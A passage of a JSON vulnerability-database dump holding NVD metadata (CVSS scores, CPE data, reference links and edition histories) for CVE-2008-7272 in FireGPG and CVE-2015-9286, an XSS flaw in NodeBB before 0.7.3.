"affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": "9258b012e591cc93a7c6b0cd1b5c6b05"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "3c75b36a7f1966a251dbe6148b866f97"}, {"key": "published", "hash": "1162e82aa1c980ee7ebee4af4c99369c"}, {"key": "references", "hash": "54b0c94164bf625d039c58f14cd4c116"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5db042f8057f3f288fe9cd4213121eb2"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f34f5d089606f7d870ccc28642bf61f774619d905673726848fc15f3a6590575", "viewCount": 25, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 2.4, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-312"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, 